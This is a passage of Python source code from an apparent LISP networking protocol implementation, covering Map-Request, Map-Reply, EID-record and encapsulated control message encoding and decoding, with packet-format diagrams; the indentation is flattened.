# Decode xTR-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(packet) == False): return(None)
#endif
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])
self.source_eid.afi = socket.ntohs(afi[0])
packet = packet[format_size::]
if (self.source_eid.afi == LISP_AFI_LCAF):
save_packet = packet
packet = self.source_eid.lcaf_decode_iid(packet)
if (packet == None):
packet = self.lcaf_decode_json(save_packet)
if (packet == None): return(None)
#endif
elif (self.source_eid.afi != LISP_AFI_NONE):
packet = self.source_eid.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source_eid.mask_len = self.source_eid.host_mask_len()
no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
self.itr_rlocs = []
while (self.itr_rloc_count != 0):
format_size = struct.calcsize("H")
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr = lisp_address(LISP_AFI_NONE, "", 32, 0)
itr.afi = socket.ntohs(afi)
#
# If Security Type LCAF, get security parameters and store in
# lisp_keys().
#
if (itr.afi != LISP_AFI_LCAF):
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
#
# Decide if we should remove security key state if ITR decided
# to stop doing key exchange when it previously had.
#
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
rloc_keys = lisp_crypto_keys_by_rloc_decap
if (rloc_keys.has_key(addr_str)): rloc_keys.pop(addr_str)
#
# If "ipc-data-plane = yes" is configured, we need to tell the
# data-plane from the lisp-etr process there is no longer a
# decryption key.
#
lisp_write_ipc_decap_key(addr_str, None)
else:
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC or
decode_key.cipher_suite == LISP_CS_25519_GCM):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_curve=False,
do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, 0)
if (packet == None): return(None)
if (len(packet) < format_size): return(None)
afi = struct.unpack("H", packet[:format_size])[0]
itr.afi = socket.ntohs(afi)
if (len(packet) < itr.addr_length()): return(None)
packet = itr.unpack_address(packet[format_size::])
if (packet == None): return(None)
if (no_crypto):
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
continue
#endif
addr_str = lisp_build_crypto_decap_lookup_key(itr, port)
stored_key = None
if (lisp_nat_traversal and itr.is_private_address() and \
source): itr = source
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_decap[addr_str]
stored_key = keys[1] if keys and keys[1] else None
#endif
new = True
if (stored_key):
if (stored_key.compare_keys(key)):
self.keys = [None, stored_key, None, None]
lprint("Maintain stored decap-keys for RLOC {}". \
format(red(addr_str, False)))
else:
new = False
remote = bold("Remote decap-rekeying", False)
lprint("{} for RLOC {}".format(remote, red(addr_str,
False)))
key.copy_keypair(stored_key)
key.uptime = stored_key.uptime
stored_key = None
#endif
#endif
if (stored_key == None):
self.keys = [None, key, None, None]
if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
key.local_public_key = None
lprint("{} for {}".format(bold("Ignoring decap-keys",
False), red(addr_str, False)))
elif (key.remote_public_key != None):
if (new):
lprint("{} for RLOC {}".format( \
bold("New decap-keying", False),
red(addr_str, False)))
#endif
key.compute_shared_key("decap")
key.add_key_by_rloc(addr_str, False)
#endif
#endif
#endif
self.itr_rlocs.append(itr)
self.itr_rloc_count -= 1
#endwhile
format_size = struct.calcsize("BBH")
if (len(packet) < format_size): return(None)
subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
self.subscribe_bit = (subscribe & 0x80)
self.target_eid.afi = socket.ntohs(afi)
packet = packet[format_size::]
self.target_eid.mask_len = mask_len
if (self.target_eid.afi == LISP_AFI_LCAF):
packet, target_group = self.target_eid.lcaf_decode_eid(packet)
if (packet == None): return(None)
if (target_group): self.target_group = target_group
else:
packet = self.target_eid.unpack_address(packet)
if (packet == None): return(None)
packet = packet[format_size::]
#endif
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.target_eid, self.target_group))
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQ")
if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsualted Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
